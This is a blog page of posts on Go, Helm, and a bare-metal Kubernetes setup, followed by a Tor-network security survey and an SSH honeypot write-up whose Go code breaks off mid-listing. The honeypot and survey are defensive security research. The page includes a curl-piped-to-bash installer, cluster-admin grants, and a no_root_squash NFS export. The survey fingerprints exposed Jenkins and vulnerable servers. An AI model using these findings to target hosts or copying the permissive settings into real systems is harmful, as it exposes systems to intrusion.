{ Josh Rendek }

<3 Ruby & Go

This is useful if you’re building a generic library/package and want to let people pass in types and convert to them/return them.

 1package main
 3import (
 4	"encoding/json"
 5	"fmt"
 6	"reflect"
 9type Monkey struct {
10	Bananas int
13func main() {
14	deliveryChan := make(chan interface{}, 1)
15	someWorker(&Monkey{}, deliveryChan)
16	monkey := <- deliveryChan
17	fmt.Printf("Monkey: %#v\n", monkey.(*Monkey))
20func someWorker(inputType interface{}, deliveryChan chan interface{}) {
21	local := reflect.New(reflect.TypeOf(inputType).Elem()).Interface()
22	json.Unmarshal([]byte(`{"Bananas":20}`), local)
23	deliveryChan <- local

Line 21 is getting the type passed in and creating a new pointer of that struct type, equivalent to &Monkey{}

Line 22 should be using whatever byte array your popping off a MQ or stream or something else to send back.

Helm not updating image, how to fix

Jul 16, 2018 - 1 minutes

If you have your imagePullPolicy: Always and deploys aren’t going out (for example if you’re using a static tag, like stable) - then you may be running into a helm templating bug/feature.

If your helm template diff doesn’t change when being applied the update won’t go out, even if you’ve pushed a new image to your docker registry.

A quick way to fix this is to set a commit sha in your CICD pipeline, in GitLab for example this is $CI_COMMIT_SHA.

If you template this out into a values.yaml file and add it as a label on your Deployment - when you push out updates your template will be different from the remote, and tiller and helm will trigger an update provided you’ve set it properly, for example:

2    - helm upgrade -i APP_NAME -i --set commitHash=$CI_COMMIT_SHA

Faster Local Dev With Minikube

Jun 5, 2018 - 1 minutes

If your developing against kubernetes services or want to run your changes without pushing to a remote registry and want to run inside kubernetes:

First create a registry running in minikube:

1kubectl create -f https://gist.githubusercontent.com/joshrendek/e2ec8bac06706ec139c78249472fe34b/raw/6efc11eb8c2dce167ba0a5e557833cc4ff38fa7c/kube-registry.yaml

Forward your localhost:5000 to 5000 on minikube:

1kubectl port-forward --namespace kube-system $(kubectl get po -n kube-system | grep kube-registry-v0 | awk '{print $1;}') 5000:5000

Use minikube’s docker daemon and then push to localhost:5000

1eval $(minikube docker-env)
2docker push localhost:5000/test-image:latest

And then you can develop your helm charts and deploy quicker using localhost. No need to configure default service account creds or getting temporary creds.

Using localhost eliminates the need to use insecure registry settings removing a lot of docker daemon configuration steps.

Kubernetes On Bare Metal

Apr 1, 2018 - 13 minutes

If you’ve been following kubernetes, you’ll understand theres a myriad of options available… I’ll cover a few of them briefly and why I didn’t choose them. Don’t know what Kubernetes is? Minikube is the best way to get going locally.

This guide will take you from nothing to a 2 node cluster, automatic SSL for deployed apps, a custom PVC/PV storage class using NFS, and a private docker registry. Helpful tips and bugs I ran into are sprinkled throughout their respective sections.

But first the goals for this cluster:
  • First-class SSL support with LetsEncrypt so we can easily deploy new apps with SSL using just annotations.
  • Bare metal for this conversation means a regular VM/VPS provider or a regular private provider like Proxmox with no special services - or actual hardware.
  • Not require anything fancy (like BIOS control)
  • Be reasonably priced (<$50/month)
  • Be reasonably production-y (this is for side projects, not a huge business critical app). Production-y for this case means a single master with backups being taken of the node.
  • Works with Ubuntu 16.04
  • Works on Vultr (and others like Digital Ocean - providers that are (mostly) generic VM hosts and don’t have specialized APIs and services like AWS/GCE)
  • I also reccomend making sure your VM provider supports a software defined firewall and a private network - however this is not a hard requirement.

Overview of Options
  • OpenShift: Owned by RedHat - uses its own special tooling around oc. Minimum requirements were to high for a small cluster. Pretty high vendor lockin.
  • KubeSpray: unstable. It used to work pretty consistently around 1.6 but when trying to spin up a 1.9 cluster and 1.10 cluster it was unable to finish. I am a fan of Ansible, and if you are as well, this is the project to follow I think.
  • Google Kubernetes Engine: Attempting to stay away from cloud-y providers so outside of the scope of this. If you want a managed offering and are okay with GKE pricing, this is the way to go.
  • AWS: Staying away from cloud-y providers. Cost is also a big factor here since this is a side-project cluster.
  • Tectonic: Requirements are to much for a small cloud provider/installation ( PXE boot setup, Matchbox, F5 LB ).
  • Kops: Only supports AWS and GCE.
  • Canonical Juju: Requires MAAS, attempted to use but kept getting errors around lxc. Seems to favor cloud provider deploys (AWS/GCE/Azure).
  • Kubicorn: No bare metal support, needs cloud provider APIs to work.
  • Rancher: Rancher is pretty awesome, unfortunately it’s incredibly easy to break the cluster and break things inside Rancher that make the cluster unstable. It does provide a very simple way to play with kubernetes on whatever platform you want.

… And the winner is… Kubeadm. It’s not in any incubator stages and is documented as one of the official ways to get a cluster setup.

Servers we’ll need:
  • $5 (+$5 for 50G block storage) - NFS Pod storage server ( 1 CPU / 1GB RAM / block storage )
  • $5 - 1 Master node ( 1 CPU / 1G RAM )
  • $20 - 1 Worker node ( 2 CPU / 4G RAM - you can choose what you want for this )
  • $5 - (optional) DB server - due to bugs I’ve ran into in production environments with docker, and various smart people saying not do it, and issues you can run into with file system consistency, I run a seperate DB server for my apps to connect to if they need it.

Total cost: $40.00

Base Worker + Master init-script
 2apt-get update
 3apt-get upgrade -y
 4apt-get -y install python
 5IP_ADDR=$(echo 10.99.0.$(ip route get | awk '{print $NF; exit}' | cut -d. -f4))
 6cat <<- EOF >> /etc/network/interfaces
 7auto ens7
 8iface ens7 inet static
 9    address $IP_ADDR
10    netmask
11    mtu 1450
13ifup ens7
15apt-get install -y apt-transport-https
16apt -y install docker.io
17systemctl start docker
18systemctl enable docker
19curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add
20echo "deb http://apt.kubernetes.io/ kubernetes-xenial main" >/etc/apt/sources.list.d/kubernetes.list
21apt-get update
22apt-get install -y kubelet kubeadm kubectl kubernetes-cni nfs-common

Lines 2-13 will run on server boot up, install python (used so Ansible can connect and do things later), update and upgrade everything, and then add the private network address. Since Vultr gives you a true private network I’m cheating a bit and just using the last octect of the public IP to define my internal LAN IP.

Line 16 we’re installing the Ubuntu packaged version of docker – this is important. There are a lot of tools that don’t bundle the proper docker version to go along with their k8s installation and that can cause all kinds of issues, including everything not working due to version mismatches.

Lines 15-22 we’re installing the kubernetes repo tools for kubeadm and kubernetes itself.

Setting up the NFS Server

I’m not going to go in depth on setting an NFS server, there’s a million guides. I will however mention the exports section which I’ve kobbled together after a few experiments and reading OpenShift docs. There’s also a good amount of documentation if you want to go the CEPH storage route as well, however NFS was the simplest solution to get setup.

Remember to lock down your server with a firewall so everything is locked down except internal network traffic to your VMs.



Export options:

  • no_root_squash - this shouldn’t be used for shared services, but if its for your own use and not accessed anywhere else this is fine. This lets the docker containers work with whatever user they’re booting as without conflicting with permissions on the NFS server.
  • no_subtree_check - prevents issues with files being open and renamed at the same time
  • no_wdelay - generally prevents NFS from trying to be smart about when to write, and forces it to write to the disk ASAP.

Setting up the master node

On the master node run kubeadm to init the cluster and start kubernetes services:

1kubeadm init --allocate-node-cidrs=true --cluster-cidr=

This will start the cluster and setup a pod network on for internal pods to use.

Next you’ll notice that the node is in a NotReady state when you do a kubectl get nodes. We need to setup our worker node next.

You can either continue using kubectl on the master node or copy the config to your workstation (depending on how your network permissions are setup):

1mkdir -p $HOME/.kube
2cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
3chown $(id -u):$(id -g) $HOME/.kube/config

Setting up the worker node

You’ll get a token command to run on workers from the previous step. However if you need to generate new tokens later on when you’re expanding your cluster, you can use kubeadm token list and kubeadm token create to get a new token.

Important Note: Your worker nodes Must have a unique hostname otherwise they will join the cluster and over-write each other (1st node will disappear and things will get rebalanced to the node you just joined). If this happens to you and you want to reset a node, you can run kubeadm reset to wipe that worker node.

Setting up pod networking (Flannel)

Back on the master node we can add our Flannel network overlay. This will let the pods reside on different worker nodes and communicate with eachother over internal DNS and IPs.

1kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml
2kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/k8s-manifests/kube-flannel-rbac.yml

After a few seconds you should see output from kubectl get nodes similar to this (depending on hostnames):

1[email protected]:~# kubectl get nodes
2NAME           STATUS    ROLES     AGE       VERSION
3k8s-master     Ready     master    4d        v1.10.0
4k8s-worker     Ready     <none>    4d        v1.10.0

Deploying the Kubernetes Dashboard

If you need more thorough documentation, head on over to the dashboard repo. We’re going to follow a vanilla installation:

1kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/master/src/deploy/recommended/kubernetes-dashboard.yaml

Once that is installed you need to setup a ServiceAccount that can request tokens and use the dashboard, so save this to dashboard-user.yaml:

 1apiVersion: v1
 2kind: ServiceAccount
 4  name: admin-user
 5  namespace: kube-system
 7apiVersion: rbac.authorization.k8s.io/v1beta1
 8kind: ClusterRoleBinding
10  name: admin-user
12  apiGroup: rbac.authorization.k8s.io
13  kind: ClusterRole
14  name: cluster-admin
16- kind: ServiceAccount
17  name: admin-user
18  namespace: kube-system

and then apply it

1kubectl apply -f dashboard-user.yaml

Next you’ll need to grab the service token for the dashbord authentication and fire up kube proxy:

1kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep admin-user | cut -f1 -d ' ') | grep -E '^token' | cut -f2 -d':' | tr -d '\t'
2kube proxy

Now you can access the dashboard at http://localhost:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/login.

Setting up our NFS storage class

When using a cloud provider you normally get a default storage class provided for you (like on GKE). With our bare metal installation if we want PersistentVolumes (PVs) and PersistentVolumeClaims (PVCs) to work, we need to set up our own private storage class.

We’ll be using nfs-client from the incubator for this.

The best way to do this is to clone the repo and go to the nfs-client directory and edit the following files:

  • deploy/class.yaml: This is what your storage will be called in when setting up storage and from kubectl get sc:
1apiVersion: storage.k8s.io/v1
2kind: StorageClass
4  name: managed-nfs-storage
5provisioner: joshrendek.com/nfs # or choose another name, must match deployment's env PROVISIONER_NAME'
  • deploy/deployment.yaml: you must make sure your provisioner name matches here and that you have your NFS server IP set properly and the mount your exporting set properly.

Create a file called nfs-test.yaml:

 1kind: PersistentVolumeClaim
 2apiVersion: v1
 4  name: test-claim
 5  annotations:
 6    volume.beta.kubernetes.io/storage-class: "managed-nfs-storage"
 8  accessModes:
 9    - ReadWriteMany
10  resources:
11    requests:
12      storage: 1Mi
14kind: Pod
15apiVersion: v1
17  name: test-pod
19  containers:
20  - name: test-pod
21    image: gcr.io/google_containers/busybox:1.24
22    command:
23      - "/bin/sh"
24    args:
25      - "-c"
26      - "touch /mnt/SUCCESS && exit 0 || exit 1"
27    volumeMounts:
28      - name: nfs-pvc
29        mountPath: "/mnt"
30  restartPolicy: "Never"
31  volumes:
32    - name: nfs-pvc
33      persistentVolumeClaim:
34        claimName: test-claim

Next just follow the repository instructions:

1kubectl apply -f deploy/deployment.yaml
2kubectl apply -f deploy/class.yaml
3kubectl create -f deploy/auth/serviceaccount.yaml
4kubectl create -f deploy/auth/clusterrole.yaml
5kubectl create -f deploy/auth/clusterrolebinding.yaml
6kubectl patch deployment nfs-client-provisioner -p '{"spec":{"template":{"spec":{"serviceAccount":"nfs-client-provisioner"}}}}'
7kubectl patch storageclass managed-nfs-storage -p '{"metadata": {"annotations":{"storageclass.kubernetes.io/is-default-class":"true"}}}'

This creates all the RBAC permissions, adds them to the deployment, and then sets the default storage class provider in your cluster. You should see something similar when running kubectl get sc now:

1NAME                            PROVISIONER           AGE
2managed-nfs-storage (default)   joshrendek.com/nfs   4d

Now lets test our deployment and check the NFS share for the SUCCESS file:

1kubectl apply -f nfs-test.yaml

If everything is working, move on to the next sections, you’ve gotten NFS working! The only problem I ran into at this point was mis-typing my NFS Server IP. You can figure this out by doing a kubectl get events -w and watching the mount command output and trying to replicate it on the command line from a worker node.

Installing Helm

Up until this point we’ve just been using kubectl apply and kubectl create to install apps. We’ll be using helm to manage our applications and install things going forward for the most part.

If you don’t already have helm installed (and are on OSX): brew install kubernetes-helm, otherwise hop on over to the helm website for installation instructions.

First we’re going to create a helm-rbac.yaml:

 1apiVersion: v1
 2kind: ServiceAccount
 4  name: tiller
 5  namespace: kube-system
 7kind: ClusterRoleBinding
 8apiVersion: rbac.authorization.k8s.io/v1beta1
10  name: tiller-clusterrolebinding
12- kind: ServiceAccount
13  name: tiller
14  namespace: kube-system
16  kind: ClusterRole
17  name: cluster-admin
18  apiGroup: ""

Now we can apply everything:

1kubectl create -f helm-rbac.yaml
2kubectl create serviceaccount --namespace kube-system tiller
3kubectl create clusterrolebinding tiller-cluster-rule --clusterrole=cluster-admin --serviceaccount=kube-system:tiller
4helm init --upgrade
5kubectl patch deploy --namespace kube-system tiller-deploy -p '{"spec":{"template":{"spec":{"serviceAccount":"tiller"}}}}'

First we install the RBAC permissions, service accounts, and role bindings. Next we install helm and initalize tiller on the server. Tiller keeps track of which apps are deployed where and when they need updates. Finally we tell the tiller deployment about its new ServiceAccount.

You can verify things are working with a helm ls. Next we can install our first application, Heapster.

Important Helm Note: Helm is great, but sometimes it breaks. If your deployments/upgrades/deletes are hanging, try bouncing the tiller pod:

1kubectl delete po -n kube-system -l name=tiller

Installing Heapster

Heapster provides in cluster metrics and health information:

1helm install stable/heapster --name heapster --set rbac.create=true

You should see it installed with a helm ls.

Installing Traefik (LoadBalancer)

First lets create a traefik.yaml values file:

 1serviceType: NodePort
 2externalTrafficPolicy: Cluster
 3replicas: 2
 4cpuRequest: 10m
 5memoryRequest: 20Mi
 6cpuLimit: 100m
 7memoryLimit: 30Mi
 9  enabled: false
11  enabled: true
13  enabled: true
14  email: [email protected]
15  staging: false
16  logging: true
17  challengeType: http-01
18  persistence:
19    enabled: true
20    annotations: {}
21    accessMode: ReadWriteOnce
22    size: 1Gi
24  enabled: true
25  domain: # YOUR DOMAIN HERE
26  service:
27    annotations:
28      kubernetes.io/ingress.class: traefik
29  auth:
30    basic:
33  enabled: true
35  enabled: false
36  ## Path to the access logs file. If not provided, Traefik defaults it to stdout.
37  # filePath: ""
38  format: common  # choices are: common, json
40  enabled: true
41## Enable the /metrics endpoint, for now only supports prometheus
42## set to true to enable metric collection by prometheus
45  hostPort:
46    httpEnabled: true
47    httpsEnabled: true

Important things to note here are the hostPort setting - with multiple worker nodes this lets us specify multiple A records for some level of redundancy and binds them to the host ports of 80 and 443 so they can receive HTTP and HTTPS traffic. The other important setting is to use NodePort so we use the worker nodes IP to expose ourselves (normally in something like GKE or AWS we would be registering with an ELB, and that ELB would talk to our k8s cluster).

Now lets install traefik and the dashboard:

1helm install stable/traefik --name traefik -f traefik.yaml --namespace kube-system

You can check the progress of this with kubectl get po -n kube-system -w. Once everything is registered you should be able to go https://traefik.sub.yourdomain.com and login to the dashboard with the basic auth you configured.

Private Docker Registry

Provided you got everything working in the previous step (HTTPS works and LetsEncrypt got automatically setup for your traefik dashboard) you can continue on.

First we’ll be making a registry.yaml file with our custom values and enable trefik for our ingress:

 1replicaCount: 1
 3  enabled: true
 4  # Used to create an Ingress record.
 5  hosts:
 6    - registry.svc.bluescripts.net
 7  annotations:
 8    kubernetes.io/ingress.class: traefik
10  accessMode: 'ReadWriteOnce'
11  enabled: true
12  size: 10Gi
13  # storageClass: '-'
14# set the type of filesystem to use: filesystem, s3
15storage: filesystem
17  haSharedSecret: ""

And putting it all together:

1helm install -f registry.yaml --name registry stable/docker-registry

Provided all that worked, you should now be able to push and pull images and login to your registry at registry.sub.yourdomain.com

Configuring docker credentials (per namespace)

There are several ways you can set up docker auth (like ServiceAccounts) or ImagePullSecrets - I’m going to show the latter.

Take your docker config that should look something like this:

2        "auths": {
3                "registry.sub.yourdomain.com": {
4                        "auth": "BASE64 ENCODED user:pass"
5                }
6        }

and base64 encode that whole file/string. Make it all one line and then create a registry-creds.yaml file:

1apiVersion: v1
2kind: Secret
4 name: regcred
5 namespace: your_app_namespace
7 .dockerconfigjson: BASE64_ENCODED_CREDENTIALS
8type: kubernetes.io/dockerconfigjson

Create your app namespace: kubectl create namespace your_app_namespace and apply it.

1kubectl apply -f registry-creds.yaml

You can now delete this file (or encrypt it with GPG, etc) - just don’t commit it anywhere. Base64 encoding a string won’t protect your credentials.

You would then specify it in your helm delpoyment.yaml like:

2  replicas: {{ .Values.replicaCount }}
3  template:
4    metadata:
5      labels:
6        app: {{ template "fullname" . }}
7    spec:
8      imagePullSecrets:
9        - name: regcred

Deploying your own applications

I generally make a deployments folder then do a helm create app_name in there. You’ll want to edit the values.yaml file to match your docker image names and vars.

You’ll need to edit the templates/ingress.yaml file and make sure you have a traefik annotation:

1  annotations:
2    kubernetes.io/ingress.class: traefik

And finally here is an example deployment.yaml that has a few extra things from the default:

 1apiVersion: extensions/v1beta1
 2kind: Deployment
 4  name: {{ template "fullname" . }}
 5  labels:
 6    chart: "{{ .Chart.Name }}-{{ .Chart.Version | replace "+" "_" }}"
 8  replicas: {{ .Values.replicaCount }}
 9  template:
10    metadata:
11      labels:
12        app: {{ template "fullname" . }}
13    spec:
14      imagePullSecrets:
15        - name: regcred
16      affinity:
17        podAntiAffinity:
18          requiredDuringSchedulingIgnoredDuringExecution:
19          - topologyKey: "kubernetes.io/hostname"
20            labelSelector:
21              matchLabels:
22                app:  {{ template "fullname" . }}
23      containers:
24      - name: {{ .Chart.Name }}
25        image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
26        imagePullPolicy: {{ .Values.image.pullPolicy }}
27        ports:
28        - containerPort: {{ .Values.service.internalPort }}
29        livenessProbe:
30          httpGet:
31            path: /
32            port: {{ .Values.service.internalPort }}
33          initialDelaySeconds: 5
34          periodSeconds: 30
35          timeoutSeconds: 5
36        readinessProbe:
37          httpGet:
38            path: /
39            port: {{ .Values.service.internalPort }}
40          initialDelaySeconds: 5
41          timeoutSeconds: 5
42        resources:
43{{ toYaml .Values.resources | indent 10 }}

On line 14-15 we’re specifying our registry credentials we created in the previous step.

Assuming a replica count >= 2, Lines 16-22 are telling kubernetes to schedule the pods on different worker nodes. This will prevent both web servers (for instance) from being put on the same node incase one of them crashes.

Lines 29-41 are going to depend on your app - if your server is slow to start up these values may not make sense and can cause your app to constantly go into a Running/ Error state and getting its containers reaped by the liveness checks.

And provided you just have configuration changes to try out (container is already built and in a registry), you can iterate locally:

1helm upgrade your_app_name . -i --namespace your_app_name --wait --debug

Integrating with GitLab / CICD Pipelines

Here is a sample .gitlab-ci.yaml that you can use for deploying - this is building a small go binary for ifcfg.net:

 2    - build
 3    - deploy
 6  DOCKER_DRIVER: overlay2
 7  IMAGE: registry.sub.yourdomain.com/project/web
10- docker:dind
13  image: docker:latest
14  stage: build
15  script:
16    - docker build -t $IMAGE:$CI_COMMIT_SHA .
17    - docker tag $IMAGE:$CI_COMMIT_SHA $IMAGE:latest
18    - docker push $IMAGE:$CI_COMMIT_SHA
19    - docker push $IMAGE:latest
22  image: ubuntu
23  stage: deploy
24  before_script:
25    - apt-get update && apt-get install -y curl
26    - curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | bash
27  script:
28    - cd deployment/ifcfg
29    - KUBECONFIG=<(echo "$KUBECONFIG") helm upgrade ifcfg . -i --namespace ifcfg --wait --debug --set "image.tag=$CI_COMMIT_SHA"

Lines 16-19 are where we tag latest and our commited SHA and push both to our registry we made in the previous steps.

Line 26 is installing helm.

Line 29 is doing a few things. First thing to note is we have our ~/.kube/config file set as a environment variable in gitlab. The <(echo)... stuff is a little shell trick that makes it look like a file on the file system (that way we don’t have to write it out in a separate step). upgrade -i says to upgrade our app, and if it doesn’t exist yet, to install it. The last important bit is image.tag=$CI_COMMIT_SHA - this helps you setup for deploying tagged releases instead of always deploying the latest from your repository.

Thats it, you should now have an automated build pipeline setup for a project on your working kubernetes cluster.

The goal of this project was to start with a base directory (in this case The Hidden Wiki) and start spidering out to discover all reachable Tor servers. Some restrictions were placed on this after a few trial runs:

  • Only HTML/JSON was parsed/spidered for more links to follow (no jpegs/xml, etc)
  • There were a few skipped websites, noteably: Facebook, Reddit, and a few Blockchain websites due to the amount of spidering/time that would be required
  • Limited to 10k visits per host so we wouldn’t infinitely keep spidering / some reasonable time frame to finish
  • Non 200 OK status responses were skipped

Table of Contents

Stack & Tools

I used a few different tools to build this out:

  • HA Proxy to load balance between tor SOCKs proxies so multiple could be run at the same time to saturate a network link
  • Redis to store state information about visits
  • Golang for the spidering
  • Postgres for data storage

This was all run on a single dedicated server over the period of about 1 week, multiple prototypes ran before that to flush out bugs.

Crawl Stats

Metric Count
Total Hosts 107,067
Total Scanned Pages 14,177,383
Total Visited (non-200+) 17,038,091

Security Headers

Technology % using
Content Security Policy (CSP) 0.15%
Secure Cookie 0.01%
– httpOnly 0%
Cross-origin Resource Sharing (CORS) 0.07%
– Subresource Integrity (SRI) 0%
Public Key Pinning (HPKP) 0.01%
Strict Transport Security (HSTS) 0.11%
X-Content-Type-Options (XCTO) 0.52%
X-Frame-Options (XFO) 0.58%
X-XSS-Protection 0%

Some of these headers are interesting when viewed through a Tor light. HSTS and HPKP for example, can be used for super cookies and tracking (although tor does protect against this across new identities) (source).

Services implementing CORS also help protect users by preventing cookie finger printing via scripts and other malicious finger printing methods.

Software Stats

We can fingerprint and figure out exposed software by taking a look at a few different signatures, like cookies and headers. There are other methods to fingerprint using the response body but due to server restrictions and time I couldn’t save every single page source, so the results based on headers/titles are below:

Source code hosting

Software Type Identifier
Gitea Cookie i_like_gitea [src]
GitLab Cookie gitlab_session [src]
Gogs Forked version has header X-Clacks-Overhead: GNU Terry Pratchett from NotABug.org

Build Servers

I’m going to focus on build servers because I think this is the most easy to breach front. Not only has Jenkins had some serious RCE’s in the past, it is very helpful in identifying itself with headers and debug information as seen below. People also generally store sensitive information in build servers as well, such as SSH keys and cloud provider credentials.

 1| X-Jenkins-Session: 8965d09b
 2| X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAA.....
 3| Server: Jetty(9.2.z-SNAPSHOT)
 4| X-Xss-Protection: 1
 5| X-Jenkins: 2.60.1
 6| X-Jenkins-Cli-Port: 46689
 7| X-Content-Type-Options: nosniff nosniff
 8| X-Frame-Options: sameorigin sameorigin
 9| X-Hudson-Theme: default
10| X-Jenkins-Cli2-Port: 46689
11| Referrer-Policy: same-origin
12| Content-Type: text/html;charset=UTF-8
13| X-Hudson: 1.395
14| X-Hudson-Cli-Port: 46689
15| Set-Cookie: JSESSIONID.112b5e69=16uts5qfqz6j....Path=/;Secure;HttpOnly

We can get Jenkins version, CLI ports, and Jetty versions all from just visiting the host.

Software Type Identifier
Jenkins Headers X-Jenkins- and X-Hudson- style headers
GitLab Cookie gitlab_session
Gocd Cookie Path / Title Generally sets a cookie path at /go and uses - Go in <title> tags
Drone Title Sets a drone title

Unfortunately I was unable to find any exposed Gocd or Drone servers.

Software Tracking

Software Type Identifier
Trac Cookie trac_session
Redmine Cookie redmine_session

I was not able to find any running BugZilla, Mantis or OTRS instances.

Total with Server Header: 15,630

Total without header: 91,437

Top 10 (full list of 282 available for download)

 1nginx | 9619
 2Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.6.30 | 2659
 3Apache | 1056
 4nginx/1.6.2 | 249
 5nginx/1.13.1 | 210
 6Apache/2.4.10 (Debian) | 161
 7Apache/2.4.18 (Ubuntu) | 100
 8Apache/2.2.22 (Debian) | 90
 9Apache/2.4.7 (Ubuntu) | 82
10lighttpd/1.4.31 | 80
11FobbaWeb/0.1 | 78
Full list available here

Just from the Server header we can gather a bunch of useful information:

  • 2,659 servers are running a potentially vulnerable OpenSSL version (1.0.1e) [vulns] and vulnerable Apache version [vulns]
  • Many servers are leaving the OS tag on, revealing a mix of operating systems. I think it’s also a safe assumption to say the same people who would leave fingerprinting on will also be using the OS package of these servers, making it easy to combine both OS vulnerabilities and web server vulnerabilities to combine attack vectors:
    • CentOS
    • Debian
    • Ubuntu
    • Windows
    • Raspbian
    • Amazon Linux
    • Fedora
    • Red Hat
    • Trisquel
    • YellowDog
    • FreeBSD
    • Scientific Linux
    • Vine
  • Some people are exposing application servers directly:
    • thin
    • node-static
    • gunicorn
    • Mojolicious
    • WSGI
    • Jetty
    • GlassFish
  • Very old versions of IIS (5.0/6.0), Apache (1.3), and Nginx
  • Nginx appears to dominate the server share on Tor - just taking the top 2 in account, nginx is at least 3.5x as popular as Apache


This was a fun project to work on and I learned quite a bit about scaling up the tor binary in order to scan the network faster. I’m hoping to make this process a bit less manual and start publishing these results regularly over at my security data website, https://hnypots.com

Have any suggestions for other software to look for? Leave a comment and let me know!

I’ve been running https://sshpot.com/ for a while now - and decided it needed to be revamped and overhauled - and thought I’d make a presentation and write up some details on the process as well. If you’d like to just view the slides, hop over here.

If you’re just looking for the source code:

Table of Contents

Design goals

I wanted to make sure this was an improvement over the previous iteration, so I laid out several goals for the rewrite:

  • Appear more ‘vulnerable’
  • Correlate commands/sessions (old version just logged data)
  • Proxy requests and capture data
  • Better statistics
  • Redesigned command simulation using interfaces instead of simple string matching

Some important steps the honeypot must do:

  • generate a new private key pair for the server on every boot (appear like a fresh server)
  • Advertise a vulnerable version - Check past CVE’s if you want to target a specific one. Important the banner must start with SSH-2.0 or the client won’t handshake
  • Must listen on port 22, so you should move the actual SSHD to port 2222 (or any other port, for example)
  • Do the SSH handshake
  • Handle requests

Appearing More Vulnerable

We need to create an SSH config for the ssh package to use when constructing a new object. An important thing to note here is the SSH-2.0 prefix to the ServerVersion - if that is missing the client will do weird things (including not connecting).

1sshConfig := &ssh.ServerConfig{
2		PasswordCallback:  passAuthCallback,
3		PublicKeyCallback: keyAuthCallback,
4		ServerVersion:     "SSH-2.0-OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013", // old and vulnerable!
5	}

Correlating Sessions and Commands

In order to correlate requests we can use the permission extension in the ssh package to store a map of data - in our case, a simple GUID to keep state across requests. This could also be used to store a user id or some other type of session identifier, for instance, if you were trying to write your own replacement ssh daemon to do things like serving up git requests.

 1func passAuthCallback(conn ssh.ConnMetadata, password []byte) (*ssh.Permissions, error) {
 2	guid := uuid.NewV4()
 3	ip, remotePort := parseIpPortFrom(conn)
 4	login := SshLogin{RemoteAddr: ip,
 5		RemotePort: remotePort,
 6		Username:   conn.User(),
 7		Password:   string(password),
 8		Guid:       guid.String(),
 9		Version:    string(conn.ClientVersion()),
10		LoginType:  "password",
11	}
12	login.Save()
13	return &ssh.Permissions{Extensions: map[string]string{"guid": guid.String()}}, nil

We want to capture as much metadata about the connection as possible, as well as capture public keys that are available when the attacker is using an ssh-agent - this can help us in the future to possibly identify bad actors. Here we marshal the public key and capture the key type being sent.

 1func keyAuthCallback(conn ssh.ConnMetadata, key ssh.PublicKey) (*ssh.Permissions, error) {
 2	guid := uuid.NewV4()
 3	ip, remotePort := parseIpPortFrom(conn)
 4	login := SshLogin{RemoteAddr: ip,
 5		RemotePort: remotePort,
 6		Username:   conn.User(),
 7		Guid:       guid.String(),
 8		Version:    string(conn.ClientVersion()),
 9		PublicKey:  key.Marshal(),
10		KeyType:    string(key.Type()),
11		LoginType:  "key",
12	}
13	go login.Save()
14	//log.Println("Fail to authenticate", conn, ":", err)
15	//return nil, errors.New("invalid authentication")
16	return &ssh.Permissions{Extensions: map[string]string{"guid": guid.String()}}, nil

Proxying Requests and Capturing Data

Now we can talk about proxying requests. I’m going to throw some code at you then explain below:

 1func HandleTcpReading(channel ssh.Channel, term *terminal.Terminal, perms *ssh.Permissions) {
 2	defer channel.Close()
 3	for {
 4		// read up to 1MB of data
 5		b := make([]byte, 1024*1024)
 6		_, err := channel.Read(b)
 7		if err != nil {
 8			if err.Error() == "EOF" {
 9				return
10			}
11		}
12		read := bufio.NewReader(strings.NewReader(string(b)))
13		toReq, err := http.ReadRequest(read)
14		// TODO: https will panic atm - not supported
15		if err != nil {
16			log.Println("Error parsing request: ", err)
17			return
18		}
19		err = toReq.ParseForm()
20		if err != nil {
21			log.Println("Error parsing form: ", err)
22			return
23		}
24		url := fmt.Sprintf("%s%s", toReq.Host, toReq.URL)
26		httpReq := &HttpRequest{
27			Headers:  toReq.Header,
28			URL:      url,
29			FormData: toReq.Form,
30			Method:   toReq.Method,
31			Guid:     perms.Extensions["guid"],
32			Hostname: toReq.Host,
33		}
35		client := &http.Client{}
36		resp, err := client.Get(fmt.Sprintf("http://%s", url))
37		if err != nil {
38			log.Fatalf("Body read error: %s", err)
39		}
41		defer resp.Body.Close()
42		body, err2 := ioutil.ReadAll(resp.Body)
43		if err2 != nil {
44			log.Fatalf("Body read error: %s", err2)
45		}
46		httpReq.Response = string(body)
47		httpReq.Save()
49		log.Printf("[ http://%s ] %s", url, body)
51		channel.Write(body)
52		// make the http request
54		//if resp, ok := httpHandler[url]; ok {
55		//	channel.Write(resp)
56		//} else {
57		//	channel.Write([]byte(""))
58		//}
59		channel.Close()
60	}

On line 5 we’re going to read directly from the TCP connection, and only up to 1MB of data - if we get an EOF we’ll return. Next on line 1213 we’re using a nice part of the http package that lets us take a raw stream of TCP bytes and convert it to the appropriate HTTP request that its asking for (like GET /foobar) and handling all the other headers/post params.

After getting the TCP request into something we can work with more easily, we parse out any form params on line 19, and then we reconstruct the url to visit on line 24.

Line 26 is using our persistence struct to save everything that has come in so far.

Line 25 and line 54 can be interchanged. For my honeypots I’m actually making the raw requests that they’re asking for (only GETs) - the other option is using the httpHandler struct and create dummy responses for various websites. After we make the raw request we store the response in our persistence struct and save it to the API on line 4647.

Finally on line 59 we close the channel to tell the client that data has been returned and is done.

Handling requests

The biggest portion of handling requests is accepting them and sending them off to be handled by the channel handler - which will be incoming commands and tcp connections. We loop to handle connections and perform the handshake for each new request.

 1for {
 2		tcpConn, err := listener.Accept()
 3		if err != nil {
 4			log.Printf("failed to accept incoming connection (%s)", err)
 5			continue
 6		}
 7		// Before use, a handshake must be performed on the incoming net.Conn.
 8		sshConn, chans, reqs, err := ssh.NewServerConn(tcpConn, sshConfig)
 9		if err != nil {
10			log.Printf("failed to handshake (%s)", err)
11			continue
12		}
14		// Check remote address
15		log.Printf("new ssh connection from %s (%s)", sshConn.RemoteAddr(), sshConn.ClientVersion())
17		// Print incoming out-of-band Requests
18		go handleRequests(reqs)
19		// Accept all channels
